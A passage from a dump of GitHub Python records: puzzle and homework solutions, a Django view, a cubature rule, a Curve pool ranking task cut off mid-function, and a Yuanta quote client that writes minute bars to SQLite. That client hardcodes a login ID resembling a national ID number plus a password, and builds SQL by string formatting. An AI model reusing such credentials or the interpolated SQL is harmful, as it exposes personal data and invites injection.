unique_reference\n","repo_name":"picsadotcom/maguire","sub_path":"backend/debits/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"6705720774","text":"# advent of code 2015 day 25\n\ndef main():\n assert 1 == get_cell_ordinal(1, 1)\n assert 12 == get_cell_ordinal(4, 2)\n 
assert 15 == get_cell_ordinal(1, 5)\n assert 31916031 == get_next(20151125)\n\n current = 20151125\n ordinal = get_cell_ordinal(2981, 3075)\n # one less, because we already have the number at field 1\n print(f\"Generating value for field {ordinal}\")\n for i in range(ordinal - 1):\n current = get_next(current)\n print(current)\n\n\ndef get_cell_ordinal(rows: int, columns: int) -> int:\n diagonal_before = rows + columns - 2\n count_up_to_current_diagonal = diagonal_before * (diagonal_before + 1) // 2\n return count_up_to_current_diagonal + columns\n\n\ndef get_next(current: int) -> int:\n return current * 252533 % 33554393\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"nresare/aoc","sub_path":"aoc2015/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21607137175","text":"\r\n#puts the pivot value to the start of arr so that 2 array has same pivot value\r\ndef putAtTheStart(arr,pivotValue,low,high): \r\n for i in range(low,high):\r\n if(arr[i] == pivotValue):\r\n arr[i],arr[low] = arr[low],arr[i]\r\n break\r\n\r\n\r\ndef partition (arr, low,high,pivotValueFromOtherArray):\r\n left = low\r\n right = high-1\r\n while(left < right):\r\n while(left < high and arr[left] <= pivotValueFromOtherArray ):\r\n left = left + 1\r\n while(right>low and arr[right] >pivotValueFromOtherArray):\r\n right = right - 1\r\n if(left < right) :\r\n arr[left],arr[right] = arr[right],arr[left]\r\n arr[low] = arr[right]\r\n arr[right] = pivotValueFromOtherArray\r\n return right\r\n\r\n\r\ndef matchGiftBox(boxes,gifts,low,high):\r\n if(low>=high or low < 0 or high > len(boxes)):\r\n return\r\n putAtTheStart(gifts,boxes[low],low,high) \r\n index = partition (gifts, low,high,boxes[low])\r\n partition(boxes, low,high,gifts[index]) \r\n matchGiftBox(boxes,gifts,low,index)\r\n matchGiftBox(boxes,gifts,index+1,high)\r\n\r\n#test\r\n\r\ngifts = [2,1,4,5,3]\r\nboxes = [3,1,5,2,4]\r\nprint(\"Before matching boxes with gifts\")\r\n\r\nprint(\"boxes:\")\r\nprint(boxes)\r\n\r\nprint(\"gifts:\")\r\nprint(gifts)\r\n\r\nmatchGiftBox(boxes,gifts,0,len(boxes))\r\nprint(\"After matching boxes with gifts\")\r\n\r\nprint(\"boxes:\")\r\nprint(boxes)\r\n\r\nprint(\"gifts:\")\r\nprint(gifts)\r\n\r\n","repo_name":"MustafaKarakasTr/CSE-321-Introduction-to-Algorithms-Course-Homeworks","sub_path":"HW2/CSE321_HW2_1801042627/matchGiftBox_1801042627.py","file_name":"matchGiftBox_1801042627.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22178689541","text":"import sys\n\nsys.path.append('/Users/chengkai/Desktop/coding/Homework/KTH/Machine_Learning/dectrees/python')\n\nimport dtree\nimport monkdata as m\nimport drawtree_qt5 as draw\nimport random\n\n# \"assignment 1\"\nprint('Entropy:')\nprint(dtree.entropy(m.monk1))\nprint(dtree.entropy(m.monk2))\nprint(dtree.entropy(m.monk3))\nprint('\\n')\n\n# \"assignment 3\"\nprint('Information Gain:')\nprint('monk1:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk1, m.attributes[i]))\nprint('monk2:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk2, m.attributes[i]))\nprint('monk3:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk3, m.attributes[i]))\nprint('\\n')\n\n# assignment 5\nt1 = dtree.buildTree(m.monk1, m.attributes)\nprint(dtree.check(t1, 
m.monk1test))\n#draw.drawTree(t1)\nt2 = dtree.buildTree(m.monk2, m.attributes)\nprint(dtree.check(t2, m.monk2test))\nt3 = dtree.buildTree(m.monk3, m.attributes)\nprint(dtree.check(t3, m.monk3test))\nprint('\\n')\n\n\n# assignment 7\ndef partition(data, fraction):\n ldata = list(data)\n random.shuffle(ldata)\n breakPoint = int(len(ldata) * fraction)\n return ldata[:breakPoint], ldata[breakPoint:]\n\n\nfraction = [0.3, 0.4, 0.5, 0.6, 0.7, 0.8]\nfor i in fraction:\n sumScore = 0\n minScore = 1\n maxScore = 0\n for j in range(100):\n score = 0\n bestScore = 0\n\n monk1train, monk1val = partition(m.monk1, i)\n t = dtree.buildTree(monk1train, m.attributes)\n bestTree = t\n bestScore = dtree.check(t, monk1val)\n while True:\n dt = dtree.allPruned(bestTree)\n lastBestScore = bestScore\n for ts in dt:\n score = dtree.check(ts, monk1val)\n if score > bestScore:\n bestScore = score\n bestTree = ts\n if bestScore == lastBestScore:\n break\n bestScore = dtree.check(bestTree, m.monk1test)\n sumScore += bestScore\n minScore = min(minScore, bestScore)\n maxScore = max(maxScore, bestScore)\n\n meanScore = sumScore / 100\n print('fraction:', i, ' score:', meanScore, 'minScore:', minScore, 'maxScore:',maxScore)\n\nprint('\\n')\n\nfraction = [0.3, 0.4, 0.5, 0.6, 0.7, 0.8]\nfor i in fraction:\n sumScore = 0\n minScore = 1\n maxScore = 0\n for j in range(100):\n score = 0\n bestScore = 0\n\n monk3train, monk3val = partition(m.monk3, i)\n t = dtree.buildTree(monk3train, m.attributes)\n bestTree = t\n bestScore = dtree.check(t, monk3val)\n while True:\n dt = dtree.allPruned(bestTree)\n lastBestScore = bestScore\n for ts in dt:\n score = dtree.check(ts, monk3val)\n if score > bestScore:\n bestScore = score\n bestTree = ts\n if bestScore == lastBestScore:\n break\n bestScore = dtree.check(bestTree, m.monk3test)\n sumScore += bestScore\n minScore = min(minScore, bestScore)\n maxScore = max(maxScore, bestScore)\n\n meanScore = sumScore / 100\n print('fraction:', i, ' score:', meanScore, 'minScore:', minScore, 'maxScore:',maxScore)\n","repo_name":"suoyita/DD2421-Machine-Learning","sub_path":"decision_trees/python/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4684035325","text":"from django.views.generic import TemplateView\n\nfrom destination.models import Country\nfrom users.models import Testimoni\nfrom .models import Team, SosmedTeam\n\nclass Index(TemplateView):\n template_name='about/index.html'\n \n def get_context_data(self, **kwargs):\n allTeam = Team.objects.all()\n context = super().get_context_data(**kwargs)\n context['listTeam'] = allTeam\n context['place'] = 'About'\n context['aboutActive'] = 'active'\n context['listCountry'] = Country.objects.all().order_by('name')\n context['listTestimoni'] = Testimoni.objects.filter(is_show=True)\n context['title_blocks_cover'] = 'About ZeeTrav'\n sosmed = []\n for team in allTeam:\n sosmed.append([SosmedTeam.objects.filter(team=team).order_by('name')])\n context['listSosmed'] = sosmed\n return context\n ","repo_name":"zeetec20/travel","sub_path":"about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37416186471","text":"\"\"\"676. 
Implement Magic Dictionary\"\"\"\n\nfrom typing import List\n\n\nclass MagicDictionary:\n def __init__(self):\n self._tree: dict[int, set[str]] = {}\n\n def buildDict(self, dictionary: List[str]) -> None:\n for word in dictionary:\n if len(word) not in self._tree:\n self._tree[len(word)] = {word}\n else:\n self._tree[len(word)].add(word)\n\n def search(self, searchWord: str) -> bool:\n if len(searchWord) not in self._tree:\n return False\n\n for word in self._tree[len(searchWord)]:\n if self._distance(word, searchWord):\n return True\n\n return False\n\n def _distance(self, word1: str, word2: str) -> int:\n count = 0\n\n for idx, char in enumerate(word1):\n if char != word2[idx]:\n count += 1\n if count > 1:\n return 0\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"medium/0676.py","file_name":"0676.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17597049264","text":"import math\n\ntime = int(input())\n\n\ndef hotel(t) :\n for i in range(t) :\n h, w, p = map(int, input().split())\n if h == 1 :\n head = str(1)\n elif (p % h) == 0 :\n head = str(h)\n else :\n head = str(p % h)\n tail = str(math.ceil(p / h))\n if len(tail) == 1 :\n tail = '0' + tail\n print(int(head + tail))\n\n\nhotel(time)","repo_name":"tldjfj123/PS","sub_path":"BOJ/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31839149445","text":"# -*- coding: UTF-8 -*-\n# Author: 元大證券資訊部溫鳳祥\n# Desc: 使用元大報價 API 取得分 K 資料並寫入 SQLite DB\n\nimport wx, wx.grid, time, sys\nfrom ctypes import byref, POINTER, windll\nfrom comtypes import IUnknown, GUID\nfrom comtypes.client import GetModule, GetBestInterface, GetEvents\nuser32 = windll.user32\natl = windll.atl\nimport sqlite3\n\n\n# 計算分 K 資料\nreq_type = -1\nmatch_hour = -1\nmatch_min = -1\nopen_pri = -1\nhigh_pri = -1\nlow_pri = -1\nclose_pri = -1\ntol_match_qty = -1\ntol_match_qty_prev = -1\n\n# grid column definitions\nCOL_MATCH_TIME = 0\nCOL_SYMBOL = 1\nCOL_OPEN_PRICE = 2\nCOL_HIGH_PRICE = 3\nCOL_LOW_PRICE = 4\nCOL_CLOSE_PRICE = 5\nCOL_TOTAL_QTY = 6\nCOL_REQ_TYPE = 7\n\n\n# ----------------------------------------------------------------------\ndef GetTimeStr():\n return time.strftime('%Y%m%d %H:%M:%S', time.localtime(time.time()))\n\n# ----------------------------------------------------------------------\nclass YuantaQuoteEvents(object):\n def __init__(self, parent, frame):\n self.parent = parent\n self.frame = frame\n def OnMktStatusChange (self, this, Status, Msg, ReqType):\n print ('OnMktStatusChange {},{},{}'.format (ReqType, Msg, Status))\n self.frame.tcLoginStatus.Clear()\n self.frame.tcLoginStatus.WriteText('{} {} ReqType={}'.format(GetTimeStr(), Msg, ReqType))\n def OnRegError(self, this, symbol, updmode, ErrCode, ReqType):\n print ('OnRegError {},{},{},{}'.format (ReqType, ErrCode, symbol, updmode))\n def OnGetMktData(self, this, PriType, symbol, Qty, Pri, ReqType):\n print ('OnGetMktData')\n def OnGetMktQuote(self, this, symbol, DisClosure, Duration, ReqType):\n print ('OnGetMktQuote')\n def OnGetMktAll(self, this, symbol, RefPri, OpenPri, HighPri, LowPri, UpPri, DnPri, MatchTime, MatchPri, MatchQty, TolMatchQty,\n BestBuyQty, BestBuyPri, BestSellQty,BestSellPri, FDBPri, FDBQty, FDSPri, FDSQty, ReqType):\n global req_type, match_hour, match_min, open_pri, high_pri, low_pri, close_pri, tol_match_qty, 
tol_match_qty_prev\n # print('OnGetMktAll: {} {} c:{} o:{} h:{} l:{} v:{}'.format(ReqType, MatchTime, MatchPri, OpenPri, HighPri, LowPri, TolMatchQty))\n\n req_type_tmp = int(ReqType)\n match_hour_tmp = int(MatchTime[0:2])\n match_min_tmp = int(MatchTime[2:4])\n match_sec_tmp = int(MatchTime[4:6])\n match_ms_tmp = int(MatchTime[6:])\n open_pri_tmp = int(OpenPri)\n high_pri_tmp = int(HighPri)\n low_pri_tmp = int(LowPri)\n close_pri_tmp = int(MatchPri)\n tol_match_qty_tmp = int(TolMatchQty)\n print('OnGetMktAll: {:02d}:{:02d}:{:02d}.{:06d} [{}] o:{} h:{} l:{} c:{} v:{} r:{}'.format(\n match_hour_tmp, match_min_tmp, match_sec_tmp, match_ms_tmp,\n symbol, open_pri_tmp, high_pri_tmp, low_pri_tmp, close_pri_tmp,\n tol_match_qty_tmp,\n req_type_tmp))\n\n if self.frame.grid1.InsertRows(0, 1):\n row = 0\n _matchTime = '{:02d}:{:02d}:{:02d}.{:06d}'.format(match_hour_tmp, match_min_tmp, match_sec_tmp, match_ms_tmp)\n self.frame.grid1.SetCellValue(row, COL_MATCH_TIME, _matchTime)\n self.frame.grid1.SetCellValue(row, COL_SYMBOL, symbol)\n self.frame.grid1.SetCellValue(row, COL_OPEN_PRICE, str(open_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_HIGH_PRICE, str(high_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_LOW_PRICE, str(low_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_CLOSE_PRICE, str(close_pri_tmp))\n self.frame.grid1.SetCellValue(row, COL_TOTAL_QTY, str(tol_match_qty_tmp))\n self.frame.grid1.SetCellValue(row, COL_REQ_TYPE, str(req_type_tmp))\n\n # self.SetCellColor(self.frame.grid1, row, COL_OPEN_PRICE, RefPri, OpenPri)\n # self.SetCellColor(self.frame.grid1, row, COL_HIGH_PRICE, RefPri, HighPri)\n # self.SetCellColor(self.frame.grid1, row, COL_LOW_PRICE, RefPri, LowPri)\n # self.SetCellColor(self.frame.grid1, row, COL_MATCH_PRICE, RefPri, MatchPri)\n\n if req_type != req_type_tmp or match_hour != match_hour_tmp or match_min != match_min_tmp:\n if req_type > -1 and match_hour > -1 and match_min > -1:\n # print('OnGetMktAll: Write MinK: {:02d}:{:02d} [{}] o:{} h:{} l:{} c:{} v:{} r:{}'.format(\n # match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, tol_match_qty - tol_match_qty_prev, req_type))\n frame.WriteMinK(match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, tol_match_qty - tol_match_qty_prev, req_type)\n tol_match_qty_prev = tol_match_qty\n tol_match_qty = tol_match_qty_tmp\n else: # first data item\n tol_match_qty = tol_match_qty_tmp\n tol_match_qty_prev = 0\n\n req_type = req_type_tmp\n match_hour = match_hour_tmp\n match_min = match_min_tmp\n open_pri = close_pri_tmp\n high_pri = close_pri_tmp\n low_pri = close_pri_tmp\n close_pri = close_pri_tmp\n\n else: # same req_type & match_hour & match_min\n if high_pri < close_pri_tmp:\n high_pri = close_pri_tmp\n if low_pri > close_pri_tmp:\n low_pri = close_pri_tmp\n close_pri = close_pri_tmp\n tol_match_qty = tol_match_qty_tmp\n\n\n def OnGetDelayClose(self, this, symbol, DelayClose, ReqType):\n print ('OnGetDelayClose')\n def OnGetBreakResume(self, this, symbol, BreakTime, ResumeTime, ReqType):\n print ('OnGetBreakResume')\n def OnGetTradeStatus(self, this, symbol, TradeStatus, ReqType):\n print ('OnGetTradeStatus')\n def OnTickRegError(self, this, strSymbol, lMode, lErrCode, ReqType):\n print ('OnTickRegError')\n def OnGetTickData(self, this, strSymbol, strTickSn, strMatchTime, strBuyPri, strSellPri, strMatchPri, strMatchQty, strTolMatQty,\n strMatchAmt, strTolMatAmt, ReqType):\n print ('OnGetTickData')\n def OnTickRangeDataError(self, this, strSymbol, lErrCode, ReqType):\n print 
('OnTickRangeDataError')\n def OnGetTickRangeData(self, this, strSymbol, strStartTime, strEndTime, strTolMatQty, strTolMatAmt, ReqType):\n print ('OnGetTickRangeData')\n def OnGetTimePack(self, this, strTradeType, strTime, ReqType):\n print ('OnGetTimePack {},{}'.format (strTradeType, strTime))\n def OnGetDelayOpen(self, this, symbol, DelayOpen, ReqType):\n print ('OnGetDelayOpen')\n def OnGetFutStatus(self, this, symbol, FunctionCode, BreakTime, StartTime, ReopenTime, ReqType):\n print ('OnGetFutStatus')\n def OnGetLimitChange(self, this, symbol, FunctionCode, StatusTime, Level, ExpandType, ReqType):\n print ('OnGetLimitChange')\n\n# ----------------------------------------------------------------------\nclass YuantaQuoteWrapper:\n def __init__(self, frame):#, bot):\n # self.bot = bot\n Iwindow = POINTER(IUnknown)()\n Icontrol = POINTER(IUnknown)()\n Ievent = POINTER(IUnknown)()\n res = atl.AtlAxCreateControlEx(\"YUANTAQUOTE.YuantaQuoteCtrl.1\", frame.Handle, None,\n byref(Iwindow),\n byref(Icontrol),\n byref(GUID()),\n Ievent)\n self.YuantaQuote = GetBestInterface(Icontrol)\n self.YuantaQuoteEvents = YuantaQuoteEvents(self, frame)#, conn, cursor)\n self.YuantaQuoteEventsConnect = GetEvents(self.YuantaQuote, self.YuantaQuoteEvents)\n\n\n# ----------------------------------------------------------------------\nclass MyApp(wx.App):\n def OnInit(self):\n # self.conn, self.cursor = CreateDb('ticks.db')\n self.CreateDb('ticks.db')\n self.Yuanta = None\n return True\n\n # create DB & table\n def CreateDb(self, fileName):\n self.conn = sqlite3.connect('ticks.db')\n self.cursor = self.conn.cursor()\n sql = 'CREATE TABLE IF NOT EXISTS TK (' \\\n 'MatchTime INTEGER, '\\\n 'Symbol CHAR(25), '\\\n 'OpenPri INTEGER, '\\\n 'HighPri INTEGER, '\\\n 'LowPri INTEGER, '\\\n 'ClosePri INTEGER, '\\\n 'MatchQty INTEGER, '\\\n 'ReqType INTEGER)'\n self.cursor.execute(sql)\n # return conn, cursor\n\n def SetMktLogin(self, frame, host, port, offhour, id, pswd):\n self.frame = frame\n self.host = host\n self.port = port\n self.offhour = offhour\n self.id = id\n self.pswd = pswd\n\n self.Yuanta = YuantaQuoteWrapper(frame)\n self.Yuanta.YuantaQuote.SetMktLogon(self.id, self.pswd, self.host, self.port, self.offhour, 0)\n\n def AddMktReg(self, symbol, updMode, reqType):\n try:\n errCode = self.Yuanta.YuantaQuote.AddMktReg(symbol, updMode, reqType, 0)\n print(\"AddMktReg({}, {}, {}) = {}\".format(symbol, updMode, reqType, errCode))\n self.frame.tcRegStatus.Clear()\n self.frame.tcRegStatus.WriteText('{}: {}'.format(GetTimeStr(), str(errCode)))\n except Exception as ex:\n print(\"AddMktReg() failed: %s\" % str(ex))\n\n def DelMktReg(self, symbol, reqType):\n try:\n errCode = self.Yuanta.YuantaQuote.DelMktReg(symbol, reqType)\n print(\"DelMktReg({}, {}) = {}\".format(symbol, reqType, errCode))\n self.frame.tcRegStatus.Clear()\n self.frame.tcRegStatus.WriteText('{}: {}'.format(GetTimeStr(), str(errCode)))\n except Exception as ex:\n print(\"DelMktReg() failed: %s\" % str(ex))\n\n def Quit(self):\n print(\"Close DB connection\")\n self.conn.close()\n\n def WriteMinK(self, match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type):\n sql = \"INSERT INTO TK (MatchTime, Symbol, OpenPri, HighPri, LowPri, ClosePri, MatchQty, ReqType)\"\\\n \" VALUES(%02d%02d, '%s', %d, %d, %d, %d, %d, %d)\"\\\n % (match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type)\n print('WriteMinK: %s' % sql)\n self.cursor.execute(sql)\n self.conn.commit()\n\n\n# 
----------------------------------------------------------------------\nclass MainFrame(wx.Frame):\n def __init__(self, parent, title, app, width=1000, height=700, host='10.214.8.64', port=80, id='', pswd='', symbol=''):\n super(MainFrame, self).__init__(parent, title=title, size=(width, height))\n self.app = app\n self.host = host\n self.port = port\n self.id = id\n self.pswd = pswd\n self.offhour = 1\n self.symbol = symbol\n\n self.InitUI()\n self.Centre()\n\n def InitUI(self):\n panel1 = wx.Panel(self)\n\n self.tcHost = wx.TextCtrl(panel1)\n self.tcPort = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n self.tcId = wx.TextCtrl(panel1)\n self.tcPswd = wx.TextCtrl(panel1, style=wx.TE_PASSWORD)\n self.cbOffhour = wx.CheckBox(panel1, label='T+1')\n self.cbOffhour.Bind(wx.EVT_CHECKBOX, self.OnOffhour)\n self.btnLogin = wx.Button(panel1, label='Login')\n self.btnLogin.Bind(wx.EVT_BUTTON, self.OnLogin)\n self.tcLoginStatus = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n # set default values\n self.tcHost.SetLabelText(self.host)\n self.tcPort.SetLabelText(str(self.port))\n self.tcId.SetLabelText(self.id)\n self.tcPswd.SetLabelText(self.pswd)\n\n self.tcSymbol = wx.TextCtrl(panel1)\n self.btnReg = wx.Button(panel1, label='Register')\n self.btnReg.Bind(wx.EVT_BUTTON, self.OnReg)\n self.btnUnreg = wx.Button(panel1, label='Unregister')\n self.btnUnreg.Bind(wx.EVT_BUTTON, self.OnUnreg)\n self.tcRegStatus = wx.TextCtrl(panel1, style=wx.TE_READONLY)\n self.btnQuit = wx.Button(panel1, label='Quit')\n self.btnQuit.Bind(wx.EVT_BUTTON, self.OnQuit)\n # set default values\n self.tcSymbol.SetLabelText(self.symbol)\n\n # info grid\n self.grid1 = wx.grid.Grid(panel1)\n self.grid1.CreateGrid(0, 8)\n self.grid1.SetColSize(0, 80)\n self.grid1.SetRowLabelSize(0)\n self.grid1.SetColLabelValue(0, '成交時間')\n self.grid1.SetColLabelValue(1, '商品代碼')\n self.grid1.SetColLabelValue(2, '開盤價')\n self.grid1.SetColLabelValue(3, '最高價')\n self.grid1.SetColLabelValue(4, '最低價')\n self.grid1.SetColLabelValue(5, '收盤價')\n self.grid1.SetColLabelValue(6, '總成交量')\n self.grid1.SetColLabelValue(7, '盤別')\n\n gs = wx.GridBagSizer(10, 10)\n gs.Add(wx.StaticText(panel1, label='Host:'), pos=(0, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='Port:'), pos=(1, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='ID:'), pos=(2, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(wx.StaticText(panel1, label='Password:'), pos=(3, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.cbOffhour, pos=(4, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n\n gs.Add(self.tcHost, pos=(0, 1), span=(1, 4), flag=wx.EXPAND, border=5)\n gs.Add(self.tcPort, pos=(1, 1), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcId, pos=(2, 1), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.tcPswd, pos=(3, 1), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.btnLogin, pos=(5, 0), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcLoginStatus, pos=(5, 1), span=(1, 8), flag=wx.EXPAND, border=5)\n\n gs.Add(wx.StaticText(panel1, label='Symbol:'), pos=(0, 5), span=(1, 1), flag=wx.EXPAND, border=5)\n gs.Add(self.tcSymbol, pos=(0, 6), span=(1, 3), flag=wx.EXPAND, border=5)\n gs.Add(self.btnReg, pos=(1, 5), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.btnUnreg, pos=(1, 7), span=(1, 2), flag=wx.EXPAND, border=5)\n gs.Add(self.tcRegStatus, pos=(2, 5), span=(1, 4), flag=wx.EXPAND, border=5)\n\n gs.Add(self.grid1, pos=(6, 0), span=(10, 10), flag=wx.EXPAND, border=5)\n gs.Add(self.btnQuit, pos=(17, 9), 
span=(1, 1), flag=wx.EXPAND, border=5)\n\n panel1.SetSizer(gs)\n\n\n def OnOffhour(self, e):\n if self.cbOffhour.GetValue():\n self.offhour = 2\n self.tcPort.SetLabelText(\"82\")\n else:\n self.offhour = 1\n self.tcPort.SetLabelText(\"80\")\n\n def OnLogin(self, e):\n self.app.SetMktLogin(self, self.tcHost.GetLineText(0), self.tcPort.GetLineText(0), self.offhour, self.tcId.GetLineText(0), self.tcPswd.GetLineText(0))\n\n def OnReg(self, e):\n self.app.AddMktReg(self.tcSymbol.GetLineText(0), \"4\", self.offhour)\n\n def OnUnreg(self, e):\n self.app.DelMktReg(self.tcSymbol.GetLineText(0), self.offhour)\n\n def OnQuit(self, e):\n self.app.Quit()\n self.Close(True)\n\n def WriteMinK(self, match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type):\n app.WriteMinK(match_hour, match_min, symbol, open_pri, high_pri, low_pri, close_pri, match_qty, req_type)\n\n# ----------------------------------------------------------------------\nif __name__ == \"__main__\":\n app = MyApp()\n frame = MainFrame(None, \"EW Quote API + SQLite Demo\", app, width=700, height=600, \\\n # host=\"10.214.8.64\", port=80, id=\"D121242093\", pswd=\"1234\", symbol=\"TXFH9\")\n host=\"apiquote.yuantafutures.com.tw\", port=80, id=\"D121242093\", pswd=\"1234\", symbol=\"TXFH9\")\n frame.Show(True)\n app.MainLoop()\n","repo_name":"vincenttuan/yuanta_python3","sub_path":"作業/盤中即時分K/溫鳳祥.py","file_name":"溫鳳祥.py","file_ext":"py","file_size_in_byte":15672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"680271418","text":"# -*- coding: utf-8 -*-\n#\nfrom __future__ import division\n\nimport numpy\nimport sympy\n\nfrom .helpers import _s\n\nfrom ..helpers import untangle\n\n\nclass Stroud1957(object):\n \"\"\"\n A. H. Stroud,\n Remarks on the Disposition of Points in Numerical Integration Formulas,\n Mathematical Tables and Other Aids to Computation,\n Vol. 11, No. 60 (Oct., 1957), pp. 
257-261,\n .\n \"\"\"\n\n def __init__(self, n, index, symbolic=False):\n frac = sympy.Rational if symbolic else lambda x, y: x / y\n sqrt = sympy.sqrt if symbolic else numpy.sqrt\n pi = sympy.pi if symbolic else numpy.pi\n sin = sympy.sin if symbolic else numpy.sin\n cos = sympy.cos if symbolic else numpy.cos\n\n self.dim = n\n if index == 2:\n self.degree = 2\n r = sqrt(3) / 6\n data = [\n (1.0, numpy.array([numpy.full(n, 2 * r)])),\n (+r, _s(n, -1, r)),\n (-r, _s(n, +1, r)),\n ]\n else:\n assert index == 3\n self.degree = 3\n n2 = n // 2 if n % 2 == 0 else (n - 1) // 2\n i_range = range(1, 2 * n + 1)\n pts = [\n [\n [sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],\n [sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],\n ]\n for k in range(1, n2 + 1)\n ]\n if n % 2 == 1:\n sqrt3pm = numpy.full(2 * n, 1 / sqrt(3))\n sqrt3pm[1::2] *= -1\n pts.append(sqrt3pm)\n pts = numpy.vstack(pts).T\n\n data = [(frac(1, 2 * n), pts)]\n\n self.points, self.weights = untangle(data)\n reference_volume = 2 ** n\n self.weights *= reference_volume\n return\n","repo_name":"kassiuskohvakka/CompPhys-project","sub_path":"env/lib/python3.6/site-packages/quadpy/ncube/stroud1957.py","file_name":"stroud1957.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37659125753","text":"from operator import not_\n\nfrom main import db\nfrom sqlalchemy import func, and_, cast, Date, any_\nimport time\nimport os\nfrom redis import Redis # type: ignore\nimport pandas as pd\nimport json\nfrom celery.utils.log import get_task_logger\n\nfrom main.const import CHAINS, BLACKLIST\nfrom models.curve.pool import CurvePool\nfrom models.curve.snapshot import CurvePoolSnapshot\nfrom tasks.queries.graph import grt_curve_pools_query\nfrom utils import shortify_pool_name\n\n\"\"\"\nThis is used to generate the rankings for the landing page\nWe simply store the outcomes in redis\n\"\"\"\nredis = Redis(\n host=\"redis\", password=os.getenv(\"REDIS_PASSWORD\", \"\"), port=6379, db=0\n)\n\npd.options.mode.chained_assignment = None\nblacklist_filter = ~(func.lower(CurvePoolSnapshot.pool).in_(BLACKLIST.keys()))\n\nDAY = 24 * 60 * 60\nlogger = get_task_logger(__name__)\n\n\ndef get_tvl_gainers_losers():\n logger.info(\"Getting largest TVL gains & losses\")\n today = (time.time() // DAY) * DAY - DAY\n yesterday = today - DAY\n\n today_tvl_query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePool.name,\n CurvePoolSnapshot.tvl,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(\n and_(\n CurvePoolSnapshot.timestamp >= today,\n CurvePoolSnapshot.timestamp < today + DAY,\n )\n )\n .filter(blacklist_filter)\n .all()\n )\n\n yesterday_tvl_query = (\n db.session.query(\n CurvePoolSnapshot.pool,\n CurvePoolSnapshot.chain,\n CurvePoolSnapshot.tvl,\n )\n .join(\n CurvePool,\n and_(\n CurvePoolSnapshot.pool == CurvePool.address,\n CurvePoolSnapshot.chain == CurvePool.chain,\n ),\n )\n .filter(\n and_(\n CurvePoolSnapshot.timestamp >= yesterday,\n CurvePoolSnapshot.timestamp < yesterday + DAY,\n )\n )\n .filter(blacklist_filter)\n .all()\n )\n if len(today_tvl_query) < 1 or len(yesterday_tvl_query) < 1:\n # on first init we won't have snapshots\n return\n\n td = pd.DataFrame(today_tvl_query)\n yd = pd.DataFrame(yesterday_tvl_query)\n\n df = pd.merge(\n yd, td, on=[\"pool\", \"chain\"], 
